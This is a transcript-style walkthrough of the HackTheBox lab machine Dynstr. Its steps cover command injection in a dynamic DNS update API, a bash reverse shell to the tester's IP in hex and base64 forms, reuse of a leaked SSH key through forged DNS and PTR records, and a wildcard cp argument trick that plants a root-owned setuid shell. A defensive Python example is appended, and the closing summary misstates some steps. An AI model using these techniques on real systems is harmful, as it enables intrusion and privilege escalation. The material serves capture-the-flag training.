HackThebox - Dynstr

IppSec · Beginner ·📰 AI News & Updates ·4y ago

Key Takeaways

The video demonstrates a hack of the Dynstr box on HackTheBox using tools like nmap, curl, and the No-IP-compatible dynamic DNS update API to discover and exploit vulnerabilities and ultimately gain root access. The hack involves command injection in the dynamic DNS update endpoint, a leaked SSH key whose authorized_keys entry only accepts a specific DNS name, and a wildcard-driven cp in a sudo script that drops a root-owned setuid binary to escalate privileges.

Full Transcript

What's going on YouTube, this is IppSec. I'm doing Dynstr from HackTheBox, which was an amazing box that showcased the power of dynamic DNS. jkr did a really good job at mirroring the API No-IP uses, so you can use the same commands that you would to update your dynamic DNS on, like, No-IP or dyndns.com on this box. However, when he cloned the API he introduced a command injection vulnerability, so within the dynamic DNS update you can actually get code execution on the box to get a shell on it. Once you have a shell on the box and you poke around, you can find an SSH private key, but you can't log in, because the authorized_keys file specifies you have to come from a specific DNS name, and the dynamic DNS key that's on the box does not have the ability to create that DNS name. So you poke around the config, find the correct key, and you can then create that hostname and utilize the private key. So with all that being said, let's jump in.

As always we're gonna start off with the nmap, so -sC for default scripts, -sV to enumerate versions, -oA to output all formats, put it in the nmap directory and call it dynstr, and then the IP address of 10.10.10.244. This can take some time to run, so I've already run it. Looking at the results we have just three ports open. The first one being SSH on port 22, and its banner tells us it's an Ubuntu server, and furthermore, based upon 8.2p1 and 4ubuntu0.2, we can guess this is going to be Ubuntu Bionic. So if I just go to Google here and type 4ubuntu0.2 and search Launchpad... we can see Launchpad is like Ubuntu's package repository, but we can see it's only uploaded to Ubuntu Focal, which, if we scroll down after selecting Focal, that is Ubuntu 20. If this did say like 7.6p1 instead of that 8.2, chances are that would be Ubuntu Bionic, which I think is version 18. Clicking on Bionic, scrolling down, that would be, yes, 18.

The other thing we can get from that is this package was released on January... February... March 10th, which is about seven months ago, so this box at time of release was relatively up to date, so chances are there's no CVEs in a package that's managed by apt. So let's take a look at the other things. We have 53 open, and nmap's telling us that is DNS, and the banner confirms it is DNS, and it being on TCP and not UDP... well, it is also on UDP, but I only scan TCP. The fact that DNS is listening on TCP means I'm probably going to want to look at things like DNSSEC or zone transfers. Big key on the zone transfer, because it's easier to enumerate; we just can't begin enumerating it until we know what zones this box supports. And a zone, if you don't know, would be like dynstr.htb. If we knew that was existing on this box we could do a zone transfer like dig axfr @10.10.10.244 dynstr.htb. It says transfer failed, so that does not work, but that may not be the actual zone, so we'll just resume once we actually enumerate zones of this box.

The next thing we have is 80, which is HTTP, and that is just running Apache. So let's go take a look at Apache, so 10.10.10.244, and we get Dyna DNS. It's a home page and says "awesome dynamic DNS", and suddenly the box listening on DNS is making sense. So scrolling down we can see the services, and it's talking about how it's a provider for dynamic DNS and it has the same API as no-ip.com, which I actually use a lot. If you don't know what dynamic DNS is, essentially it's just a short-lived DNS name that your computer pushes to, and it's a short... updated... it stays for much longer, but anyways, it's a way to get your IP address to a DNS name and keep it in case your IP changes. Now I like this because my edge firewalls can resolve DNS names, so like iptables and pfSense support it, I know Palo Alto, pretty much everything supports whitelisting a DNS name. So my laptop has a dynamic DNS and my pfSense box at home will whitelist certain ports for that laptop, so if somehow I lock myself out of the VPN remotely, well, I can SSH directly into my firewall from my laptop. Now the dangerous thing with that is if I ever go to like a conference and use hotel Wi-Fi, my dynamic DNS updates to the hotel's IP address; anyone at that hotel now has a reverse lookup to my domain name and could access port 22 of my firewall. So there are some downsides to doing that, but I really hate being locked out of my home network, so that's why I have that there. But that's a complete big tangent, let's talk about this box.

So we probably should look up the API for No-IP, because it's giving us a few zones right here: we have dnsalias.htb, dynamicdns.htb and no-ip.htb. So the very first thing I want to do is test some zone transfers, so let's go back to that dig and I'm going to test each of these to see if we can extract any extra names. A zone transfer on a dynamic DNS provider would be a pretty bad day. So we can just look at these, and it looks like nothing is leaking, or all these don't have anything. Since it says transfer failed and not like zero results, I'm gonna guess zone transfer is not enabled. We can see it's running in beta mode and it has a username and password: dyndns is the username and dns backwards is the password. It has statistics and previous clients. It also has an email at dyna.htb, so we could try testing dyna.htb to see if we can zone transfer that. We can't. So let's go look up No-IP's APIs, and it says they use the same one, so I'm just going to Google "no ip api", go to Google, and we can see it says "integrate with it" and how do we do it. So it's doing an HTTP request, username colon password at noip.com/nic/update, and specifying the hostname and IP address. So if I send this and we change it to... let's see, actually the very first thing I want to do is just go to /nic and see what happens. So if I go to 10.10.10.244/nic we get a blank page. If I do /pleasesubscribe we get Not Found, so we know /nic
does exist, and then the next thing we could do is /update and see if update exists, and it says badauth. So now we want to test username and password. So what we can do is let's go back to the home page, or I can just type it, but it was dyndns as the username and then dns backwards as the password. So let's specify... let's just do this in curl. So curl, then the username and password like that, @, we should specify http://, put it in quotes, 10.10.10.244/nic/update?... I think it's hostname, is it hostname? hostname is equal to pleasesubscribe, if I can spell, I always think about that one, .ippsec.rocks, and ip is equal to 10.10.14.8. So we can see if we can register something, and we get badauth. That's weird, I wonder if that's not how we specify username and password, or did I typo something? dyndns... is it like something different? Oh, dynadns, there we go. So now we get wrongdomain ippsec.rocks. So if we go back to this page, it supports a few aliases, so we have dnsalias.htb, dynamicdns.htb and no-ip.htb. So let's go and take a look at this, so I can say hostname is equal to ippsec.dynamicdns.htb, and it says good. So if I now go nslookup, say the server is 10.10.10.244, and we try to do ippsec.dynamicdns.htb, it resolves to me, but I don't know exactly what this did. We could furthermore try that zone transfer, so... this is down here, here we go, and we called it dynamicdns.htb, still can't do a zone transfer. So I don't know exactly what we have here.

We can try just doing various bad characters, see if we can enumerate anything. I'm gonna put like an exclamation point, and before I do bad characters let's put it in single quotes, and we have "nsupdate failed". And nsupdate, if we Google exactly what this program is, we'll see it's a dynamic DNS update utility, so we know it's using dynamic DNS to update. We could test for like command injection, so I'm gonna try sleep+1 and we don't get anything. However, I think we need to URL encode this. I'm going to try backticks to see if that gets around it, and it's looking like it's taking a bit longer, so we can do time and this curl. So it takes two seconds with that sleep in. We can put sleep 0 and it's instant. If I do sleep 2 I'm guessing it will be like three or four seconds. So we have confirmed we have some type of code injection. So an easier way to work around this, instead of living in the command line, is just send this to Burp. So at this point I'm going to do -p for proxy http://localhost:8080.

There's a --proxy, there we go, that looks better. So let's go to Proxy, send this into the Repeater tab, and we can confirm it's still working. It's waiting on the request, and we should see within four seconds it comes back. We do sleep 0, it works almost immediately. And the reason why these semicolons weren't working is because... I don't know exactly. If we URL encode these, do they work? Ctrl+U, nsupdate failed. So for some reason... oh, because we're probably breaking the code. So we do semicolons and then that, let's see, semicolon, semicolon, let's encode this, it failed. Let's put a comment. Still... I'm not sure exactly why we can't use semicolons, must just be a bad character or I'm screwing something up. That's why I always test for multiple ways to do something. So right now I am testing a different code execution technique. I'm just highlighting these to make sure I don't have to URL encode it, and it looks like we can insert commands via backticks or this way, so two different ways we can do it. It looks like we just can't like break out of the command with a semicolon. So the next thing to do is try to get a reverse shell, so I'm going to try bash -c, then bash -i >& /dev/tcp/10.10.14.8/9001 0>&1 like that, and then let's URL encode this payload. We can listen on a port, so nc -lvnp 9001, and we send the payload and it does not work. We get wrongdomain 10.10.14.8 9001.
So what I'm going to try to do is I'm going to add a few characters here. So if I now... by adding two on this side, I'm testing if there's some type of truncation going on, it only accepts a certain number of characters. So I'm expecting if it does truncation I won't see 10, it'll begin with .14.8, and that's not what happened, it still says 10.14.8. So now I'm guessing there's some type of delimiter in my actual command, and I'm looking at this and we have periods, and it's using periods to identify domains, so chances are putting all these domains is what broke it. We can kill this reverse shell real quick, and I think I can show this a different way. So if I do ippsec.dynamicdns.htb like this, it lets me create this record, right? But if I try doing a subdomain, if I make ippsec a different domain like test, we get wrongdomain test.dynamicdns. So the code is valid and we only have three levels, and our domain is the... I don't know if it's upper or lower level in DNS, but the subdomain is what we put, so we can't do four levels. And by doing 10.10.10 it's treating each of those as a subdomain or whatever it's called, and that's why it's failing. But lucky for us, IPs can be defined in many different ways. My favorite way to define an IP is hex. So we can just do "ip to hex", go to Google, and if you don't know, check out the Holiday video, it's a good old one, it's the first box I actually solved on HackTheBox, and it goes over this type of encoding. But I'm just going here, converting it into hex, and we can do this. So 0a in hex is 10, or a is 10, so it's probably better to do it here. This clipboard, there we go. So it's represented as .10.10.10. wait, oh no, this is fourteen, 0e, .8. Yep, 10.10.14.8. I was reading this as 0a for whatever reason, but yeah, so 10.10.14.8.

So I didn't even need to go to the website to encode that if I just, like, thought about my octets a little bit. So let's do 0x0a0a0e08 and we should listen on 9001, and nc -lvnp 9001, and send this. That did not work. Oh, let's see, 0x0a0a0e08 9001 0>&1. I think that should have worked. Let's try with backticks, and that's "nsupdate failed". So what I'm going to do here is I'm going to un-URL-encode this and look at the payload. I don't have a single quote here, I wonder if that was it. Ctrl+U, there we go, it was me doing a bad payload, I did not have a single quote. If I did not spot that with the eye, what I was about to do is just copy this entire thing. So if I copy that, whoops, let's copy, and I paste this into the terminal, I'd see this, and then that's where I'd be like, oh, I forgot the single quote. So that's what I was doing. I wasn't positive if I could actually use an IP this way, and if I had to work around this and I couldn't specify IPs this way, I would probably resort to like a base64 payload. So if I do the same shell that I did, and we just say echo... see if I echo that, that's good. I actually don't need the bash -c doing this, and we can get rid of the hex, so 10.10.14.8, okay, so base64 -w0, and then we could do echo -n this | base64 -d | bash. So we could try something like this. I'm actually not positive it's going to work, I assume it is, but that's why I always like testing multiple things, because if it doesn't work after I solve this box I'm probably going to debug exactly why it failed, so I just know in the future. So we can try doing that payload, and then again we have to URL encode it, send it, and we just get nsupdate failed. Do I have... because I had an extra quote. But it works that way too, so there's two different ways you could bypass whatever filter it had, or that period being a bad character. So let's go continue along on this box. I'm going to do python3 -c 'import pty; pty.spawn("/bin/bash")', Ctrl+Z, stty raw -echo; fg, enter, enter, and then export TERM=xterm so I can clear the screen.

So the very first thing I always like doing when I get into a web directory is looking at the source to see if there's any type of credentials. I don't know what this attribution.txt is... so I think this is just some type of credits linking where they took all the images from. Nice to see people giving credit. It's just putting a blank index.html so you don't have directory listing enabled. So if we remove that file, can we do that? No, because it's owned by root. Or do we own the directory? Nope, it's owned by root. But if we removed this file, then we went to /nic, it would just have the directory listing enabled and show us that update is a file. If I look at update, it is a file, update, a PHP script. So that is ugly. Let's do base64 update... actually cat update | nc 10.10.14.8 9001, and over here nc -lvnp 9001 > update.php, okay, Ctrl+C, vim update.php, and now we can view this a bit better. That's still weird how it has all those spaces, but okay. Server PHP auth password set, so this is the dynadns... like the username and password we use, that's what this is pulling. Okay, so this is saying if these passwords aren't set, and then checking if they're equal to dynadns and then dns backwards, so that's what that is. Let's see, this is a FILTER_VALIDATE_IP. So right here the script is checking if the zone is either of these three, and if it's not, it's going to exit with that wrongdomain thing. And then here we're doing an update DNS entry, so it's setting the server to localhost, sending the zone, update deleting the entry and then adding the new entry, and one of these I'm guessing is user controlled. Let's see, h, I'm guessing h is user controlled. So what I'd probably do here to analyze it is I take update.php and I'm going to grab this, I'm going to do php -a, and we can say list($h)... actually I wonder if, yeah, I think they did list($h, $d), and after I type this out I know it's hostname and domain, but let's do root.ippsec.rocks. If we specify that
and then print $h, it should be root, and then $d is ippsec.rocks. So that's how we know exactly what that code is doing, and since we fully control h, this is where we're actually doing the command injection. So let's see, the next one, this is going to be host.domain, so this is where we're injecting right here, and also injecting right here because it uses h again. But yeah, we just have command execution in here, which is a system command, hopefully that makes sense. Then we have this /etc/bind ddns key, and because we have it doing the checks in the script, right off the bat I want to see if I can create other entries. So I'm going to copy this and we can try going back to a shell, and we can do... what is it, nsupdate, and then oh actually it's not just nsupdate, we have to specify the key, so key... and that's the wrong clipboard, oh god. And that's nsupdate -k and it should be, let's see, key /etc/bind/ddns.key, okay. So we kind of just mimic exactly what it does. So the first thing is server 127.0.0.1, then it's setting the zone to %s, so let's see, that would be h... so this is going to be, let's do dyna.htb, which was the email, and we can do the next, update add ippsec.dyna.htb... was that actually an allowed one? I don't think it was, no, it was not one of those allowed. So add, 30, IN, A, let's see, the next one should be the IP address, so 10.10.14.8. So this is the record to add, and at the end we specify send, and it says NOTAUTH. So we don't have permission to add this record to this zone. So it looks like the BIND key that we're using is specific to the three zones up here. So let's try the same exact command, instead of dyna we can do no-ip.htb, send, wait, NOTAUTH. I thought I could do that. I have no clue how this program is working. Let's see, do I need that t1? So t1, maybe we need that, copy paste, send. I wonder what t1 is. Let's try the other one, dynadns... oh, it's probably because I had set the zone earlier and I did not set the zone to no-ip. So let's try this again, and instead of ippsec we'll do ippsec2, and it doesn't work. So it looks like that was definitely related to me setting that zone command. So let's try ippsec here, send, so that works. Let's add it to this record, and it looks like it just hangs when we try to update this dyna.htb zone. Maybe it's the second time we're updating, so I'm just going to send it to check this. So let's just make sure this is the very first thing we send, and it still just hangs here. So I don't think we can update that zone, and again, at this point, I don't know what it would buy us. Oh, there we go, "response to SOA query was unsuccessful", so we know it did not work. But at this point it doesn't matter, because all we're doing is testing a key that we saw in the web server.

So the next thing I do is more recon on this box. So let's go into the home directory, and we can see we can go into both of these. So let's try checking out the dyna directory, and this is empty, they don't have any files. Let's look at bindmgr and we have a few folders. So bindmgr is set so only that user can read, we're www-data, so we can't read that user.txt, but we can go into .ssh and we have an id_rsa but we can't read it. There is authorized_keys and this id.pub file. We can cat authorized_keys and we can see from a specific domain they can use SSH. So right now we're looking for the id_rsa key. I'm going to check this support-case folder and we can see a few commands, so I'm going to cat each of these files and see what they have. And that is an ugly thing that just did a bunch of stuff, spewed to the text, but I do see an SSH key, and looking up here we have open at... current working directory /home/bindmgr/.ssh/id_rsa. So it is leaking that key, and I'm guessing this .script output each of these files or something, because that was the output of an strace. So if I cat strace and we go up, we can see the key is there too. And the reason why I knew it's strace is because it's just printing out the system call traces. The s stands for syscall, or maybe it's system trace, but that's how I remember it.

Let's copy this key, so I'm highlighting this all, copy, and then we can create the key here. So vi bindmgr, paste the key, and then we just need to do a quick search and replace, so backslash n... I did two backslashes because I gotta escape the first backslash, and I'm going to replace that with a return. Does that work? Looks like it does, and we have a pretty SSH key. Now the one thing that a lot of people do when they copy and paste, and it's super annoying, but let's go back up here. If I just had copy and pasted by... oh weird, I can't click and highlight. reset, can I highlight? I think catting that one file screwed up my terminal so I can't do it. I'm not sure you can hear my mouse clicking, but I'm trying to highlight this text. But anyways, because we're in this weird copy mode, if I try to highlight this text it's going to copy these line breaks here as well, when it should not copy the line breaks, so you'd have extra characters to filter out in vi. So it's always easier in tmux to copy by going into the copy mode, which I hit space... I'm not sure if that's default, I don't think it is, because I think default is emacs mode, not vim, but if you watch my tmux video it goes over how I do this copy and pasting. But I digress. So let's try logging in with this, so ssh -i bindmgr bindmgr@10.10.10.244, and we can now... the first step I do is quickly validate my key. I can see the fingerprint I'm validating with is this JN1... we can, let's do ssh-keygen, is it -l bindmgr? Let's see, how do I validate a fingerprint hash? I think I need a -f for input file, so -l -f. Oh, I think the first reason I couldn't log in is it was an unprotected key file. So still can't log in, but if I look at this fingerprint it is JN plus whatever. Let's go over to the .ssh directory, I'm going to cat id_rsa.pub, actually yeah, cat that, and cat authorized_keys, and we can see the .pub key is the same as authorized_keys, we just don't have that "from" yet. So I'm going to copy
this public key. So copied it, let's vi ssh.pub... I actually called it bindmgr, so it's bindmgr.pub, just to stay a little bit organized. I do ssh-keygen -l -f bindmgr and then we can do .pub, and we see these fingerprints are identical, so we know we have the right SSH key. And again, that key's fingerprint is also sent with SSH, so if I do that ssh -i -v thing, this is bindmgr, you can see SSH is sending the fingerprint of each key it has and then getting this one, which is the last one, and then failing. But that is how SSH key authentication works, it takes all your public keys that you have on your box, sends them the fingerprint, and if the fingerprint can continue then it sends more information. I forget what box we went over SSH handshakes in depth, but if you go to ippsec.rocks I'm sure you can find it if you want to learn more about the SSH handshake. But right now we're on a mission to create that .infra domain name. So if we cat this authorized_keys, we know we need .infra.dyna.htb. So what I'm going to do is I just want to put that down here, because my clipboard is acting funny, so in case it goes off my history I know exactly what I want. I'm also going to put that in a copy. So let's go back to /var/www/html/nic and we can try this update again. So if we cat update, we want to do an nsupdate -k /etc/bind/ddns.key, and then we want to do update add ippsec.infra.dyna.htb, and we need 30 IN A 10.10.14.

I think that has to be a capital A. Looks good, send, and it's actually REFUSED. So if we do it to a domain that it doesn't know about, it says REFUSED. The last time it had just said it couldn't look up, because this box probably has no record of what dyna.htb is, so that's probably why that last lookup failed, which is funny because that's the... oh, I don't know what I was doing earlier, but that is what I was expecting. So we get this REFUSED message. So the next thing we can do is look for more SSH keys, and I'm going to reset again, okay, because my tty was screwed up and I couldn't do things. So I'm going to go into the bind directory and look at other keys, and we have this ddns.key, which is the one we used, but we also have infra.key. So if I look at infra.key we can see we can read this one as well. I'm just going to cat both of these and we can see it is a different key but the same exact type. So I'm going to do this nsupdate command again, instead of specifying ddns.key we'll specify infra.key, and it was, I think, add ippsec.infra.dyna.htb 30 IN A 10.10.14.8, send, and now we have a lookup. So if I do an nslookup, server 10.10.10.244, ippsec.infra.dyna.htb, it returns back to me. So let's try SSH again, so ssh -i bindmgr bindmgr@10.10.10.244, but we still can't get in. And the reason why we can't is because SSH also depends on a reverse lookup, and reverse lookups, if we just do 10.10.14.8 to the server, are in this like in-addr.arpa thing, and each of these is going to be a zone, and this is just the IP address in reverse order. So what I want to do is create a reverse lookup. See, can I do this off the top of my head? So add 8.14.10.10.in-addr.arpa 30 IN and it's a PTR lookup... that's not right. I don't think it's ippsec.infra.dyna.htb, is it? Is this it? Send. Oh, 10.10.14.8.

Hey, I did it right. So now we have this reverse lookup that is pointing to ippsec.infra.dyna.htb, and we've also created that record. So now when I do the same SSH command we get in, and again that's because we have satisfied this criteria of being on the infra domain. So now the next bit is... oh, and if you were using like No-IP and you wanted to like secure your home with this, you could point your lookup to be like yourhostname.dyndns.com, and then your SSH key will only work when you have that dynamic DNS record set to the correct IP. So that is something cool. And another thing about that, you may not want to do it because it'll only work when you're like external and you have a WAN address, but if you're trying to SSH into a local box, you're going to SSH in and your IP's probably going to be like 192.168.1.2, but your record.infra.dyna.htb record's going to be the WAN address, so you'd have to do multiple froms here to allow your local subnet to also be allowed. I hope that makes sense.

But the next thing, let's see, we're that user, so we can check sudo -l and we can see we can run this script with no password. So I'm going to do vi /usr/local/bin/bindmgr.sh... did I typo something? I did, "loca", local. And I still don't have syntax highlighting because vim is not installed, okay, so I'm just going to send this file back to my box, so nc 10.10.14.8 9001, and the reason why is I just like to have syntax highlighting. This is bindmgr.sh, I need to do -lvnp, see, there we go. You can tell, like, the longer the video goes the more mistakes I make, just because it's like mentally taxing to talk and type at the same time. Come on, .sh, there we go. So now we have syntax highlighting. So what this is doing is it's checking if the file .version exists, and if it doesn't exist it's going to exit with 42, and then it's going to check if, let's see, it's going to get the contents of .version and check if it's less than the contents of the bindmgr directory's .version, and if it is less than it, it's
going to exit with 43. And that bindmgr directory is up here, so it's /etc/bind/named.bindmgr. So the next piece here, it's going to do for file and print out each file, and then it's going to stage files with this cp command, and it's using a wildcard here. So this is where the actual exploit exists, because it's doing a wildcard, and how a wildcard works in bash is it just takes every file in that directory and puts it in as if you typed it in the command. So if you had a file that was like --rootme, and if you specified this argument it worked, then cp would treat this as the argument. That was a bad example, let's... let's do cd /dev/shm, we can go in here and do touch and we can say --does-not-exist. If I do ls we can see that file, and we can do touch pleasesubscribe, if I do ls now we can see both those files. If I do ls *, we actually get an error message, because the star treated this as an argument, which, yeah, does not work, it just thought we typed this command. "Does not exit", I didn't even say "exist", but this is what it thought we typed, if I did that correctly and put the e there. So that is why that matters. And cp does have a preserve flag, let's see, --preserve=all, let's see, -p, let's see, --no-preserve, well that's what we want, but it's not telling us everything. The mode is specifically because that's going to be like the permissions; ownership we don't want to preserve, and timestamps doesn't matter. What I'm getting at here is when I do sudo I am now the root user, so if it does a copy it may be the owner of itself. We can actually just show you, let's see, let's remove --does-not-exist. Does that work, rm --does-not-exist? No, it's such a pain to remove these files. Escape, escape, does not ex... I think I typoed and forgot the t there. Let's see, rm ./--does-not-exit, there we go, removed it. I typoed that file, so that's probably why we were screwing up, or maybe the ./ is what saved me, but it's how you can delete those, I guess.

So let's add the... I guess let's not add any flags real quick. So let's do touch file, or we can echo 1 > .version, and then chmod 777 on pleasesubscribe. So if I look at that, bindmgr owns it and it's got all the bits turned on. So let's now run that sudo command, so sudo /usr/local/bin/bindmgr.sh, and let's look at /etc/bind/named.bindmgr. We can see the permissions are whatever the umask is, so rwxr-xr-x, and the owner is root and bind. So we want to preserve the owner... I wonder if we can just do -p then, because we're going to preserve everything. So... oh, we don't want to preserve the owner, because if I do touch -p... I'm sorry, it's been a long day. But now if I run this command again, and we're going to have to update the version, so echo 2 > .version and run that sudo again, ls -la /etc/bind/named.bindmgr, we preserved the owner, so the owner now is us. We don't want that, we want the owner still to be root. So if we do man cp, preserve, let's see, attribute list, does it have attribute list? attr_list... see, default is mode, ownership, timestamps. I wish it told me what mode and everything meant, I guess I have to do a lot of googling or check a different man page to get what attribute list is. But we're in a preserve mode, so instead of -p I want to do --preserve=mode. So now when I run the same sudo... /etc/bind/named... I wonder why I could do that, because I didn't update the version, oh well. But we can see root now owns the file and it kept our special bits. So what we can do now is copy /bin/bash to a directory, and because we own this directory, or we own the file, we can do chmod 4755 on bash, and now when we look at the permissions it is a setuid binary, which means it will allow us to execute the setuid command, which would escalate us to root only if root owned this binary. So if I do bash with -p now, it doesn't do anything because root doesn't own this binary. However, by doing this sudo command, where is sudo, let's just sudo. Now I do ls -la /etc/bind/named.bindmgr, we now have bash with that setuid bit and root owns it. So all I have to do now is do bash -p here. If I don't do the -p, it's not going to do anything, so I've specified -p and I do id, my effective ID is root, so I go into /root and we can now read root.txt.

If you're curious what that -p actually means, I am too, I just muscle memory it. So let's look at exactly what -p is. See, "if the shell is not supplied"... let's see, "the shell is started with the effective user (group) id not equal to the real user id and the -p option is not supplied", whatever. I wonder what -p means. It's not posix, -c, that's not it. I actually don't know what the -p means. Let's just Google real quick, what does the -p argument mean in bash, let's see, that's not it, let's Google explainshell, and let's try bash -p... question mark. I know this flag is unique to some distros, so yeah, I'm not sure exactly what it's supposed to mean, I guess maybe the distro did not update the help. All right, really, I'm drawing a blank, -p POSIX? I don't think it's --posix. Let's just exit a few times, id, p-o-s-i-x, yeah. So I'm not exactly sure what that -p means, but I'm sure if you check the comments someone will let you know, because I'm sure someone out there that watched the video knows exactly what -p means. But anyways, take care guys and I'll see you all next week.
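The command injection above comes from the host label being handed to a shell unchecked while only the zone is validated. As an added example (not the box's update.php and not IppSec's code), the Python stand-in below puts the unsafe pattern beside a hardened /nic/update handler that validates the label and IP and feeds nsupdate its script over stdin with no shell. The three zones, the /etc/bind/ddns.key path and the good/wrongdomain responses come from the page; the badhost/badip codes, the `runner` hook and `fake_runner` are assumptions for offline use.

```python
import ipaddress
import re
import subprocess

# Zones the service is willing to update (the three aliases on the home page).
ALLOWED_ZONES = frozenset({"dnsalias.htb", "dynamicdns.htb", "no-ip.htb"})

# One RFC 1123 host label: letters, digits, hyphens; no leading/trailing hyphen.
# Backticks, $(...), spaces, semicolons and dots all fail this check.
LABEL_RE = re.compile(r"(?!-)[A-Za-z0-9-]{1,63}(?<!-)")

# Key path as seen on the box; it is only used as an argv element here.
DDNS_KEY = "/etc/bind/ddns.key"

# Record of what fake_runner was asked to execute (for offline demonstration).
RECORDED = []


def split_hostname(hostname):
    """Split 'host.zone' on the first dot and enforce the zone allowlist.
    Extra dots end up in the zone part, so four-level names are rejected
    with wrongdomain, exactly as the walkthrough observed."""
    host, _, zone = hostname.partition(".")
    if not host or zone not in ALLOWED_ZONES:
        raise ValueError("wrongdomain")
    return host, zone


def unsafe_shell_command(hostname, ip):
    """Approximation of the vulnerable pattern: zone checked, host label
    interpolated into a shell string that /bin/sh will expand."""
    host, zone = split_hostname(hostname)
    script = (f"server 127.0.0.1\nzone {zone}\n"
              f"update delete {host}.{zone}\n"
              f"update add {host}.{zone} 30 IN A {ip}\nsend\n")
    return f"printf '{script}' | nsupdate -k {DDNS_KEY}"


def parse_request(hostname, ip):
    """Hardened validation: strict label, strict dotted-quad IPv4."""
    host, zone = split_hostname(hostname)
    if not LABEL_RE.fullmatch(host):
        raise ValueError("badhost")  # hypothetical error code
    try:
        addr = ipaddress.IPv4Address(ip)  # rejects "0x0a0a0e08", "10.10.14", ...
    except ValueError:
        raise ValueError("badip") from None  # hypothetical error code
    return host, zone, str(addr)


def nsupdate_script(host, zone, addr, ttl=30):
    """Build the nsupdate batch from already-validated pieces."""
    fqdn = f"{host}.{zone}"
    return "\n".join([
        "server 127.0.0.1",
        f"zone {zone}",
        f"update delete {fqdn}",
        f"update add {fqdn} {ttl} IN A {addr}",
        "send",
    ]) + "\n"


def apply_update(hostname, ip, runner=subprocess.run):
    """Run nsupdate with an argv list (no shell) and the script on stdin."""
    host, zone, addr = parse_request(hostname, ip)
    script = nsupdate_script(host, zone, addr)
    result = runner(["nsupdate", "-k", DDNS_KEY], input=script,
                    text=True, capture_output=True)
    return "good" if result.returncode == 0 else "dnserr"


def handle(hostname, ip, runner=subprocess.run):
    """Map validation failures to the short response codes the API uses."""
    try:
        return apply_update(hostname, ip, runner)
    except ValueError as exc:
        return str(exc)


def fake_runner(argv, **kwargs):
    """Offline stand-in for subprocess.run: records argv and stdin, reports success."""
    RECORDED.append((argv, kwargs.get("input", "")))
    return subprocess.CompletedProcess(argv, 0)


if __name__ == "__main__":
    for name, ip in [("ippsec.dynamicdns.htb", "10.10.14.8"),
                     ("`sleep 2`.dynamicdns.htb", "10.10.14.8"),
                     ("ippsec.dynamicdns.htb", "0x0a0a0e08")]:
        print(name, ip, "->", handle(name, ip, fake_runner))
```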

Original Description

00:00 - Intro
01:00 - Start of nmap discovering the distribution of Ubuntu based upon SSH Headers
03:40 - Looking at the WebPage and discovering credentials
06:20 - Checking No-IP's documentation for updating Dynamic DNS Names
07:30 - Using Curl to create a dynamic DNS Name
10:10 - Testing for Command Injection
12:45 - Enumerating the bad character and explaining why we could not use periods
14:45 - Converting the IP Address to a format that won't have periods (Hex)
19:00 - Reverse Shell returned, checking out the web source
28:00 - Discovering hosts from *.infra.dyna.htb can ssh into the box if there is a private key and finding the private key in the support directory
32:15 - Using SSH-Keygen to get the SSH Keys fingerprints to make sure private and public key match
35:00 - Attempting to create the DNS Record with the DNS Key that was in the web source
36:35 - Finding a second DNS Key, which can update Infra's subdomains
40:30 - SSH in as bindmgr and discover we can execute a bash script with sudo, exploiting a wild card argument
45:35 - Testing the cron without doing anything malicious
47:55 - Creating the file --preserve=mode, which the cp command will treat as an argument letting us drop a SetUID Binary and have it owned by root


The video teaches how to hack the Dynstr box on HackThebox using dynamic DNS, command injection, and setuid binaries to escalate privileges. The hack involves using tools like nmap, curl, and No-IP API to discover and exploit vulnerabilities.

Key Takeaways
  1. Use nmap to discover vulnerabilities
  2. Use curl to inject commands
  3. Use Burp Suite to send requests
  4. Use nc to test for command injection
  5. Use base64 encoding to bypass IP filtering
  6. Exploit update.php script to obtain credentials
💡 The use of dynamic DNS and command injection can be used to exploit vulnerabilities and gain root access.

